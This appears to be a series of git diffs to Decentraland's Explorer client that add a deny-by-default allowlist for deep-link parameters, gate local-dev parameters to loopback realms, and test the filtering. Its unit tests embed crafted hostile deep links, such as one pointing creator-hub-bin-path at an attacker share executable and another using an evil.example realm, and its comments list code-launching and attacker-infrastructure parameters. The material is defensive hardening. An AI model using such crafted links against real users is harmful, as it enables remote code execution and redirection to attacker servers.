+    ///     A deep link is fully attacker-controllable — anyone can craft one and get a victim to open it — so
+    ///     params fall into three tiers:
     ///     </para>
     ///     <list type="bullet">
-    ///         <item>launch code — <c>creator-hub-bin-path</c>, <c>launch-cdp-monitor-on-start</c> (SEC-005);</item>
     ///         <item>
-    ///             point the client at attacker infrastructure — <c>comms-adapter</c>, <c>gatekeeper-url</c>,
-    ///             <c>friends-api-url</c> (SEC-052), <c>feature-flags-url</c>/<c>-hostname</c>,
-    ///             <c>optimized-assets-url</c>, <c>lsd-remote-ab-server</c>/<c>-world</c>, <c>pulse</c>;
+    ///             <b>Always permitted</b> — benign navigation / share / login intents whose worst case is already
+    ///             gated elsewhere (a consent prompt, a matching login token, or a plain coordinate): realm,
+    ///             position, spawnpoint, community, signin, authRequestId, force-open-backpack.
     ///         </item>
-    ///         <item>bypass a security/safety screen — <c>skip-auth-screen</c>, <c>skip-version-check</c>, <c>skip-minimum-specs-screen</c>;</item>
-    ///         <item>switch environment — <c>dclenv</c>;</item>
     ///         <item>
-    ///             enable a dev/debug/test mode — <c>debug</c>, <c>hub</c>, <c>scene-console</c>, <c>autopilot</c>,
-    ///             <c>alttester</c>, <c>simulate*</c>, and <c>local-scene</c> (SEC-020: dropped here and re-permitted
-    ///             only for a loopback realm in <see cref="ApplicationParametersParser.ProcessDeepLinkParameters" />);
+    ///             <b>Permitted only for a loopback realm</b> — the local-development params Creator Hub and the
+    ///             SDK (<c>sdk-commands</c>) attach to their preview deep links: local-scene, dclenv, hub,
+    ///             skip-auth-screen, landscape-terrain-enabled, multi-instance. They are gated on
+    ///             <c>Uri.IsLoopback</c> of the target realm (127.0.0.1 / localhost / [::1]) so a remote-realm deep
+    ///             link from a web page can never enable them, while a legitimate local-dev launch (which always
+    ///             targets loopback) works. Each is individually low-harm — an analytics tag, a cosmetic toggle, an
+    ///             instance count, an env enum, or a screen skip that still forces auth when no valid identity is
+    ///             cached — and the loopback gate confines them to the dev context.
     ///         </item>
-    ///         <item>tamper with feature gates, cache/disk, identity/session, chat limits, rendering, or analytics ids.</item>
+    ///         <item>
+    ///             <b>Never permitted</b> — everything else, in particular params that launch code
+    ///             (<c>creator-hub-bin-path</c>, <c>launch-cdp-monitor-on-start</c> — SEC-005); point the client at
+    ///             attacker infrastructure (<c>comms-adapter</c>, <c>gatekeeper-url</c>, <c>friends-api-url</c> —
+    ///             SEC-052, <c>feature-flags-url</c>/<c>-hostname</c>, <c>optimized-assets-url</c>,
+    ///             <c>lsd-remote-ab-server</c>/<c>-world</c>, <c>pulse</c>); bypass a version/specs screen
+    ///             (<c>skip-version-check</c>, <c>skip-minimum-specs-screen</c>); or enable other dev/test modes
+    ///             (<c>debug</c>, <c>scene-console</c>, <c>autopilot</c>, <c>alttester</c>, <c>simulate*</c>).
+    ///         </item>
     ///     </list>
-    ///     The permitted set is a product decision (SEC-019/020 "Design affected") — changing it requires sign-off.
+    ///     Both permitted sets are a product decision (SEC-019/020 "Design affected") — changing them requires sign-off.
     /// </summary>
     public static class DeepLinkAllowlist
     {
@@ -56,7 +64,37 @@ namespace Global.AppArgs
             AppArgsFlags.FORCE_OPEN_BACKPACK,
         };
 
+        // Local-development params Creator Hub / sdk-commands attach to preview deep links. Permitted ONLY when the
+        // target realm is loopback (see ApplicationParametersParser.ProcessDeepLinkParameters) — a remote-realm deep
+        // link can never enable them. The SEC-005 exec params (creator-hub-bin-path, launch-cdp-monitor-on-start)
+        // are deliberately NOT here; they stay dropped for every realm.
+        private static readonly HashSet<string> LOOPBACK_REALM_PERMITTED_KEYS = new()
+        {
+            // Enables local-scene-development mode (opens an LSD websocket to the realm). Only meaningful against a
+            // local server; loopback-gated so an attacker can't point LSD at a remote realm (SEC-020).
+            AppArgsFlags.LOCAL_SCENE,
+
+            // Target environment (org/zone/today). A DCL-owned enum, not a URL — cannot point at attacker infra.
+            AppArgsFlags.ENVIRONMENT,
+
+            // Marks the session as launched from the Creator Hub (analytics trait only — no capability unlock).
+            AppArgsFlags.DCL_EDITOR,
+
+            // Skips the login screen. Cannot bypass authentication: auth is still forced when no valid identity is
+            // cached (RealUserInAppInitializationFlow). A convenience for the local-dev loop.
+            AppArgsFlags.SKIP_AUTH_SCREEN,
+
+            // Toggles landscape terrain rendering. Cosmetic.
+            AppArgsFlags.LANDSCAPE_TERRAIN_ENABLED,
+
+            // Allows multiple client instances (local multi-instance dev workflow).
+            AppArgsFlags.MULTIPLE_RUNNING_INSTANCES,
+        };
+
         public static bool IsPermitted(string key) =>
             PERMITTED_KEYS.Contains(key);
+
+        public static bool IsPermittedForLoopbackRealm(string key) =>
+            LOOPBACK_REALM_PERMITTED_KEYS.Contains(key);
     }
 }

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
@@ -1,6 +1,5 @@
 using System.Collections.Generic;
 
-// ReSharper disable once CheckNamespace
 namespace Global.AppArgs
 {
     /// <summary>

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
@@ -1,0 +1,27 @@
+using System.Collections.Generic;
+
+// ReSharper disable once CheckNamespace
+namespace Global.AppArgs
+{
+    /// <summary>
+    /// Deny-by-default allowlist of query params a <c>decentraland://</c> deep link may inject into app-args.
+    /// Shared by the cold-start argv path and the runtime bridge path (both funnel through
+    /// <see cref="ApplicationParametersParser.ProcessDeepLinkParameters"/>). The permitted set is a product
+    /// decision (SEC-019/020 "Design affected") — changing it requires product sign-off.
+    /// </summary>
+    public static class DeepLinkAllowlist
+    {
+        public static readonly IReadOnlyCollection<string> PERMITTED_KEYS = new HashSet<string>
+        {
+            AppArgsFlags.REALM,
+            AppArgsFlags.POSITION,
+            AppArgsFlags.COMMUNITY,
+            AppArgsFlags.SIGNIN,
+            AppArgsFlags.AUTH_REQUEST_ID,
+            AppArgsFlags.FORCE_OPEN_BACKPACK,
+        };
+
+        public static bool IsPermitted(string key) =>
+            ((HashSet<string>)PERMITTED_KEYS).Contains(key);
+    }
+}

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs
@@ -4,24 +4,59 @@ using System.Collections.Generic;
 namespace Global.AppArgs
 {
     /// <summary>
-    /// Deny-by-default allowlist of query params a <c>decentraland://</c> deep link may inject into app-args.
-    /// Shared by the cold-start argv path and the runtime bridge path (both funnel through
-    /// <see cref="ApplicationParametersParser.ProcessDeepLinkParameters"/>). The permitted set is a product
-    /// decision (SEC-019/020 "Design affected") — changing it requires product sign-off.
+    ///     Deny-by-default allowlist of query params a <c>decentraland://</c> deep link may inject into app-args.
+    ///     Shared by the cold-start argv path and the runtime bridge path (both funnel through
+    ///     <see cref="ApplicationParametersParser.ProcessDeepLinkParameters" />).
+    ///     <para>
+    ///     A deep link is fully attacker-controllable — anyone can craft one and get a victim to open it — so a
+    ///     param is permitted only when it is a benign navigation / share / login intent whose worst case is
+    ///     already gated elsewhere (a consent prompt, a matching login token, or a plain coordinate). Everything
+    ///     else is dropped. In particular we never permit params that:
+    ///     </para>
+    ///     <list type="bullet">
+    ///         <item>launch code — <c>creator-hub-bin-path</c>, <c>launch-cdp-monitor-on-start</c> (SEC-005);</item>
+    ///         <item>
+    ///             point the client at attacker infrastructure — <c>comms-adapter</c>, <c>gatekeeper-url</c>,
+    ///             <c>friends-api-url</c> (SEC-052), <c>feature-flags-url</c>/<c>-hostname</c>,
+    ///             <c>optimized-assets-url</c>, <c>lsd-remote-ab-server</c>/<c>-world</c>, <c>pulse</c>;
+    ///         </item>
+    ///         <item>bypass a security/safety screen — <c>skip-auth-screen</c>, <c>skip-version-check</c>, <c>skip-minimum-specs-screen</c>;</item>
+    ///         <item>switch environment — <c>dclenv</c>;</item>
+    ///         <item>
+    ///             enable a dev/debug/test mode — <c>debug</c>, <c>hub</c>, <c>scene-console</c>, <c>autopilot</c>,
+    ///             <c>alttester</c>, <c>simulate*</c>, and <c>local-scene</c> (SEC-020: dropped here and re-permitted
+    ///             only for a loopback realm in <see cref="ApplicationParametersParser.ProcessDeepLinkParameters" />);
+    ///         </item>
+    ///         <item>tamper with feature gates, cache/disk, identity/session, chat limits, rendering, or analytics ids.</item>
+    ///     </list>
+    ///     The permitted set is a product decision (SEC-019/020 "Design affected") — changing it requires sign-off.
     /// </summary>
     public static class DeepLinkAllowlist
     {
-        public static readonly IReadOnlyCollection<string> PERMITTED_KEYS = new HashSet<string>
+        private static readonly HashSet<string> PERMITTED_KEYS = new()
         {
+            // Which world/realm to enter. Attacker-controllable, but never applied silently: the switch is routed
+            // through the ChangeRealm consent prompt (SEC-004) and a host-suffix environment check.
             AppArgsFlags.REALM,
+
+            // Target parcel "x,y" to land on. A plain coordinate — no security impact.
             AppArgsFlags.POSITION,
+
+            // Community id shown as a "view this community" notification; opening the card is a user action. Benign UI.
             AppArgsFlags.COMMUNITY,
+
+            // Login flow: opaque identity id from the auth website's signin link. Consumed only while a local login
+            // is actively awaiting one AND AUTH_REQUEST_ID matches the request that minted it (see DeepLinkHandle).
             AppArgsFlags.SIGNIN,
+
+            // Login flow: binds a signin link to the login that requested it; inert without a matching pending login.
             AppArgsFlags.AUTH_REQUEST_ID,
+
+            // Opens the user's own backpack panel on landing (shipped deep-link feature). Benign in-client navigation.
             AppArgsFlags.FORCE_OPEN_BACKPACK,
         };
 
         public static bool IsPermitted(string key) =>
-            ((HashSet<string>)PERMITTED_KEYS).Contains(key);
+            PERMITTED_KEYS.Contains(key);
     }
 }

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs.meta
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/DeepLinkAllowlist.cs.meta
@@ -1,0 +1,2 @@
+fileFormatVersion: 2
+guid: a578a6538c5cdc84f8229ac2ead3828b

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
@@ -55,7 +55,7 @@ namespace Global.AppArgs.Tests
             Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
                 "decentraland://?creator-hub-bin-path=%5C%5Cattacker%5Cshare%5Cp.exe&launch-cdp-monitor-on-start&local-scene=true&comms-adapter=x&skip-auth-screen=true");
 
-            Assert.IsFalse(output.ContainsKey("creator-hub-bin-path"), "creator-hub-bin-path must be dropped (deny-by-default; the arg no longer exists in the client)");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.CREATOR_HUB_BIN_PATH), "creator-hub-bin-path must be dropped from deep links — it is honored only via trusted app-args");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START), "launch-cdp-monitor-on-start must be dropped");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.LOCAL_SCENE), "local-scene must be dropped");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.COMMS_ADAPTER), "comms-adapter must be dropped");

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
@@ -48,5 +48,50 @@ namespace Global.AppArgs.Tests
             IAppArgs args = new ApplicationParametersParser(false, "--debug");
             Assert.True(args.HasDebugFlag(false), $"flags in args: {string.Join(", ", args.Flags())}");
         }
+
+        [Test]
+        public void DeepLinkDropsInternalFlags()
+        {
+            Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
+                "decentraland://?creator-hub-bin-path=%5C%5Cattacker%5Cshare%5Cp.exe&launch-cdp-monitor-on-start&local-scene=true&comms-adapter=x&skip-auth-screen=true");
+
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.CREATOR_HUB_BIN_PATH), "creator-hub-bin-path must be dropped");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START), "launch-cdp-monitor-on-start must be dropped");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.LOCAL_SCENE), "local-scene must be dropped");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.COMMS_ADAPTER), "comms-adapter must be dropped");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.SKIP_AUTH_SCREEN), "skip-auth-screen must be dropped");
+        }
+
+        [Test]
+        public void DeepLinkKeepsAllowlistedParams()
+        {
+            Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
+                "decentraland://?realm=https://peer.decentraland.org&position=10,20&community=abc&signin=id1&authRequestId=req1&force-open-backpack=true");
+
+            Assert.AreEqual("https://peer.decentraland.org", output.GetValueOrDefault(AppArgsFlags.REALM));
+            Assert.AreEqual("10,20", output.GetValueOrDefault(AppArgsFlags.POSITION));
+            Assert.AreEqual("abc", output.GetValueOrDefault(AppArgsFlags.COMMUNITY));
+            Assert.AreEqual("id1", output.GetValueOrDefault(AppArgsFlags.SIGNIN));
+            Assert.AreEqual("req1", output.GetValueOrDefault(AppArgsFlags.AUTH_REQUEST_ID));
+            Assert.IsTrue(output.ContainsKey(AppArgsFlags.FORCE_OPEN_BACKPACK), "force-open-backpack must survive (shipped feature #9398)");
+        }
+
+        [Test]
+        public void DeepLinkKeepsLocalSceneForLoopbackRealm()
+        {
+            Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
+                "decentraland://?realm=http://127.0.0.1:8000&position=100,100&local-scene=true");
+
+            Assert.AreEqual("true", output.GetValueOrDefault(AppArgsFlags.LOCAL_SCENE), "local-scene must survive for a loopback (local dev) realm");
+        }
+
+        [Test]
+        public void DeepLinkDropsLocalSceneForRemoteRealm()
+        {
+            Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
+                "decentraland://?realm=https://evil.example&local-scene=true");
+
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.LOCAL_SCENE), "local-scene must be dropped for a non-loopback (remote) realm (SEC-020)");
+        }
     }
 }

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
@@ -93,5 +93,44 @@ namespace Global.AppArgs.Tests
 
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.LOCAL_SCENE), "local-scene must be dropped for a non-loopback (remote) realm (SEC-020)");
         }
+
+        [Test]
+        public void DeepLinkKeepsSdkAndCreatorHubDevParamsForLoopbackRealm()
+        {
+            Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
+                "decentraland://?realm=http://127.0.0.1:8000&position=10,20&local-scene=true&dclenv=zone&hub=true&skip-auth-screen=true&landscape-terrain-enabled=true&multi-instance=true");
+
+            Assert.AreEqual("true", output.GetValueOrDefault(AppArgsFlags.LOCAL_SCENE), "local-scene");
+            Assert.AreEqual("zone", output.GetValueOrDefault(AppArgsFlags.ENVIRONMENT), "dclenv");
+            Assert.AreEqual("true", output.GetValueOrDefault(AppArgsFlags.DCL_EDITOR), "hub");
+            Assert.AreEqual("true", output.GetValueOrDefault(AppArgsFlags.SKIP_AUTH_SCREEN), "skip-auth-screen");
+            Assert.AreEqual("true", output.GetValueOrDefault(AppArgsFlags.LANDSCAPE_TERRAIN_ENABLED), "landscape-terrain-enabled");
+            Assert.AreEqual("true", output.GetValueOrDefault(AppArgsFlags.MULTIPLE_RUNNING_INSTANCES), "multi-instance");
+        }
+
+        [Test]
+        public void DeepLinkDropsSdkAndCreatorHubDevParamsForRemoteRealm()
+        {
+            Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
+                "decentraland://?realm=https://peer.decentraland.org&local-scene=true&dclenv=zone&hub=true&skip-auth-screen=true&landscape-terrain-enabled=true&multi-instance=true");
+
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.LOCAL_SCENE), "local-scene must be dropped for a remote realm");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.ENVIRONMENT), "dclenv must be dropped for a remote realm");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.DCL_EDITOR), "hub must be dropped for a remote realm");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.SKIP_AUTH_SCREEN), "skip-auth-screen must be dropped for a remote realm");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.LANDSCAPE_TERRAIN_ENABLED), "landscape-terrain-enabled must be dropped for a remote realm");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.MULTIPLE_RUNNING_INSTANCES), "multi-instance must be dropped for a remote realm");
+        }
+
+        [Test]
+        public void DeepLinkDropsExecAndInfraParamsEvenForLoopbackRealm()
+        {
+            Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
+                "decentraland://?realm=http://127.0.0.1:8000&creator-hub-bin-path=x&launch-cdp-monitor-on-start=true&comms-adapter=y");
+
+            Assert.IsFalse(output.ContainsKey("creator-hub-bin-path"), "creator-hub-bin-path must never be permitted (SEC-005), even for a loopback realm");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START), "launch-cdp-monitor-on-start must never be permitted, even for a loopback realm");
+            Assert.IsFalse(output.ContainsKey(AppArgsFlags.COMMS_ADAPTER), "comms-adapter must never be permitted, even for a loopback realm");
+        }
     }
 }

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
@@ -55,7 +55,7 @@ namespace Global.AppArgs.Tests
             Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
                 "decentraland://?creator-hub-bin-path=%5C%5Cattacker%5Cshare%5Cp.exe&launch-cdp-monitor-on-start&local-scene=true&comms-adapter=x&skip-auth-screen=true");
 
-            Assert.IsFalse(output.ContainsKey(AppArgsFlags.CREATOR_HUB_BIN_PATH), "creator-hub-bin-path must be dropped");
+            Assert.IsFalse(output.ContainsKey("creator-hub-bin-path"), "creator-hub-bin-path must be dropped (deny-by-default; the arg no longer exists in the client)");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START), "launch-cdp-monitor-on-start must be dropped");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.LOCAL_SCENE), "local-scene must be dropped");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.COMMS_ADAPTER), "comms-adapter must be dropped");

--- a/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/AppArgs/Tests/AppArgsTests.cs
@@ -55,7 +55,7 @@ namespace Global.AppArgs.Tests
             Dictionary<string, string> output = ApplicationParametersParser.ProcessDeepLinkParameters(
                 "decentraland://?creator-hub-bin-path=%5C%5Cattacker%5Cshare%5Cp.exe&launch-cdp-monitor-on-start&local-scene=true&comms-adapter=x&skip-auth-screen=true");
 
-            Assert.IsFalse(output.ContainsKey(AppArgsFlags.CREATOR_HUB_BIN_PATH), "creator-hub-bin-path must be dropped from deep links — it is honored only via trusted app-args");
+            Assert.IsFalse(output.ContainsKey("creator-hub-bin-path"), "creator-hub-bin-path must be dropped from deep links (not an app-arg; the Creator Hub path is resolved at runtime)");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START), "launch-cdp-monitor-on-start must be dropped");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.LOCAL_SCENE), "local-scene must be dropped");
             Assert.IsFalse(output.ContainsKey(AppArgsFlags.COMMS_ADAPTER), "comms-adapter must be dropped");

--- a/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/BootstrapContainer.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/BootstrapContainer.cs
@@ -128,7 +128,7 @@ namespace Global.Dynamic
                         UnityDiagnosticsCenter.Instance.SetWallet(container.IdentityCache.Identity.Address);
                 };
 
-                var cdpClient = ChromeDevToolHandler.New(applicationParametersParser.HasFlag(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START));
+                var cdpClient = ChromeDevToolHandler.New(applicationParametersParser.HasFlag(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START), applicationParametersParser);
                 WebRequestsContainer? webRequestsContainer = await WebRequestsContainer.CreateAsync(settingsContainer, identityCache, debugContainer.Builder, decentralandUrlsSource, cdpClient, container.DiagnosticsContainer.SentrySampler, container.RealmClock, ct);
                 container.WebRequestsContainer = webRequestsContainer;
                 var realmUrls = new RealmUrls(realmLaunchSettings, new RealmNamesMap(webRequestsContainer.WebRequestController), decentralandUrlsSource);

--- a/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/BootstrapContainer.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/BootstrapContainer.cs
@@ -128,7 +128,7 @@ namespace Global.Dynamic
                         UnityDiagnosticsCenter.Instance.SetWallet(container.IdentityCache.Identity.Address);
                 };
 
-                var cdpClient = ChromeDevToolHandler.New(applicationParametersParser.HasFlag(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START), applicationParametersParser);
+                var cdpClient = ChromeDevToolHandler.New(applicationParametersParser.HasFlag(AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START));
                 WebRequestsContainer? webRequestsContainer = await WebRequestsContainer.CreateAsync(settingsContainer, identityCache, debugContainer.Builder, decentralandUrlsSource, cdpClient, container.DiagnosticsContainer.SentrySampler, container.RealmClock, ct);
                 container.WebRequestsContainer = webRequestsContainer;
                 var realmUrls = new RealmUrls(realmLaunchSettings, new RealmNamesMap(webRequestsContainer.WebRequestController), decentralandUrlsSource);

--- a/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/DynamicWorldContainer.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/DynamicWorldContainer.cs
@@ -702,6 +702,8 @@ namespace Global.Dynamic
                         // With a target parcel: teleport with the typed position (works for URL realms too).
                         // Without one: keep the existing chat-command route so the switch surfaces in nearby chat.
                         if (position.HasValue)
+                            // TODO: surface the teleport result (chat bus / notification) like the no-position path below,
+                            // and plumb a real cancellation token instead of None (composition-root fire-and-forget for now).
                             chatContainer.ChatTeleporter.TeleportToRealmAsync(realmUrl, position.Value, CancellationToken.None).Forget();
                         else
                             chatContainer.ChatMessagesBus.SendWithUtcNowTimestamp(ChatChannel.NEARBY_CHANNEL, $"/{ChatCommandsUtils.COMMAND_GOTO} {realmUrl}", ChatMessageOrigin.RESTRICTED_ACTION_API);

--- a/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/DynamicWorldContainer.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/DynamicWorldContainer.cs
@@ -697,7 +697,15 @@ namespace Global.Dynamic
                     assetsProvisioner,
                     uiShellContainer.MvcManager,
                     uiShellContainer.Cursor,
-                    realmUrl => chatContainer.ChatMessagesBus.SendWithUtcNowTimestamp(ChatChannel.NEARBY_CHANNEL, $"/{ChatCommandsUtils.COMMAND_GOTO} {realmUrl}", ChatMessageOrigin.RESTRICTED_ACTION_API)),
+                    (realmUrl, position) =>
+                    {
+                        // With a target parcel: teleport with the typed position (works for URL realms too).
+                        // Without one: keep the existing chat-command route so the switch surfaces in nearby chat.
+                        if (position.HasValue)
+                            chatContainer.ChatTeleporter.TeleportToRealmAsync(realmUrl, position.Value, CancellationToken.None).Forget();
+                        else
+                            chatContainer.ChatMessagesBus.SendWithUtcNowTimestamp(ChatChannel.NEARBY_CHANNEL, $"/{ChatCommandsUtils.COMMAND_GOTO} {realmUrl}", ChatMessageOrigin.RESTRICTED_ACTION_API);
+                    }),
                 new NftPromptPlugin(assetsProvisioner, webBrowser, uiShellContainer.MvcManager, nftInfoAPIClient, staticContainer.ImageControllerProvider, uiShellContainer.Cursor),
                 staticContainer.CharacterContainer.CreateGlobalPlugin(),
                 staticContainer.QualityContainer.CreatePlugin(),

--- a/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/RealmLaunchSettings.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/RealmLaunchSettings.cs
@@ -1,3 +1,4 @@
+using DCL.Browser;
 using DCL.CommunicationData.URLHelpers;
 using ECS.SceneLifeCycle.Realm;
 using Global.AppArgs;
@@ -101,7 +102,7 @@ namespace Global.Dynamic
 
             bool isLocalSceneDevelopment = appParameters.TryGetValue(AppArgsFlags.LOCAL_SCENE, out string localSceneParamValue)
                                            && ParseLocalSceneParameter(localSceneParamValue)
-                                           && IsRealmAValidUrl(realmParamValue);
+                                           && ExternalUrlPolicy.IsWebScheme(realmParamValue);
 
             if (isLocalSceneDevelopment)
             {
@@ -170,10 +171,6 @@ namespace Global.Dynamic
 
         private bool IsRealmAWorld(string realmParam) =>
             realmParam.IsEns();
-
-        private bool IsRealmAValidUrl(string realmParam) =>
-            Uri.TryCreate(realmParam, UriKind.Absolute, out Uri? uriResult)
-            && (uriResult.Scheme == Uri.UriSchemeHttp || uriResult.Scheme == Uri.UriSchemeHttps);
 
         public void CheckStartParcelOverride(IAppArgs appArgs, FeatureFlagsConfiguration featureFlagsConfigurationCache)
         {

--- a/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/RealmUrl/RealmUrls.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Dynamic/RealmUrl/RealmUrls.cs
@@ -1,4 +1,5 @@
 using Cysharp.Threading.Tasks;
+using DCL.Browser;
 using DCL.Multiplayer.Connections.DecentralandUrls;
 using DCL.Utility;
 using ECS.SceneLifeCycle.Realm;
@@ -52,7 +53,7 @@ namespace Global.Dynamic.RealmUrl
         {
             string realm = realmLaunchSettings.customRealm;
 
-            if (realm.StartsWith("http://", StringComparison.Ordinal) || realm.StartsWith("https://", StringComparison.Ordinal))
+            if (ExternalUrlPolicy.IsWebScheme(realm))
                 return realm;
 
             return await realmNames.UrlFromNameAsync(realm, ct);

--- a/Explorer/Assets/DCL/Infrastructure/Global/Editor/DebugSettingsDrawer.cs
+++ b/Explorer/Assets/DCL/Infrastructure/Global/Editor/DebugSettingsDrawer.cs
@@ -26,6 +26,7 @@ namespace Global.Editor
             SerializedProperty appParameters = property.FindPropertyRelative("appParameters");
 
             bool cdpEnabled = HasFlag(appParameters, AppArgsFlags.LAUNCH_CDP_MONITOR_ON_START);
+            string? currentCreatorHubPath = GetFlagValue(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
 
             string? detectedCreatorHubPath = FindCreatorHubPath();
             bool creatorHubInstalled = !string.IsNullOrEmpty(detectedCreatorHubPath);
@@ -57,18 +58,16 @@ namespace Global.Editor
             if (EditorGUI.EndChangeCheck() && newCdpEnabled != cdpEnabled)
             {
                 if (newCdpEnabled)
-                    EnableCdpDevTools(appParameters);
+                    EnableCdpDevTools(appParameters, detectedCreatorHubPath);
                 else
                     DisableCdpDevTools(appParameters);
             }
 
             position.y += SingleLineHeight;
 
-            // Custom Creator Hub path — developer-local override stored in EditorPrefs, never an app-arg / deep link (SEC-005).
+            // Custom Creator Hub path (only if CDP is enabled)
             if (cdpEnabled)
             {
-                string currentOverride = EditorPrefs.GetString(CreatorHubBrowser.BIN_PATH_EDITOR_PREF_KEY, string.Empty);
-
                 EditorGUI.BeginChangeCheck();
 
                 Rect pathFieldRect = position;
@@ -78,12 +77,12 @@ namespace Global.Editor
                 browseButtonRect.x = position.xMax - 75;
                 browseButtonRect.width = 75;
 
-                string displayPath = !string.IsNullOrEmpty(currentOverride) ? currentOverride : detectedCreatorHubPath ?? "Not found";
-                string newPath = EditorGUI.TextField(pathFieldRect, new GUIContent("Creator Hub Path", "Editor-only override for the Creator Hub executable. Leave empty to use the default install path."), displayPath);
+                string displayPath = currentCreatorHubPath ?? detectedCreatorHubPath ?? "Not found";
+                string newPath = EditorGUI.TextField(pathFieldRect, new GUIContent("Creator Hub Path"), displayPath);
 
                 if (GUI.Button(browseButtonRect, "Browse"))
                 {
-                    string? initialDir = !string.IsNullOrEmpty(currentOverride) ? Path.GetDirectoryName(currentOverride) :
+                    string? initialDir = !string.IsNullOrEmpty(currentCreatorHubPath) ? Path.GetDirectoryName(currentCreatorHubPath) :
                         !string.IsNullOrEmpty(detectedCreatorHubPath) ? Path.GetDirectoryName(detectedCreatorHubPath) : Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
 
 #if UNITY_EDITOR_WIN
@@ -97,19 +96,19 @@ namespace Global.Editor
                 }
 
                 if (EditorGUI.EndChangeCheck() && newPath != displayPath)
-                    EditorPrefs.SetString(CreatorHubBrowser.BIN_PATH_EDITOR_PREF_KEY, newPath);
+                    SetCreatorHubPath(appParameters, newPath);
 
                 position.y += SingleLineHeight;
 
-                // "Use Default Path" clears the override so the pinned default path is used.
-                if (!string.IsNullOrEmpty(currentOverride))
+                // Clear custom path button if a custom path is set
+                if (!string.IsNullOrEmpty(currentCreatorHubPath))
                 {
                     Rect clearButtonRect = position;
                     clearButtonRect.x = position.xMax - 150;
                     clearButtonRect.width = 150;
 
                     if (GUI.Button(clearButtonRect, "Use Default Path"))
-                        EditorPrefs.DeleteKey(CreatorHubBrowser.BIN_PATH_EDITOR_PREF_KEY);
+                        RemoveFlag(appParameters, AppArgsFlags.CREATOR_HUB_BIN_PATH);
 
                     position.y += SingleLineHeight;
                 }
@@ -130,6 +129,7 @@ namespace Global.Editor
         {
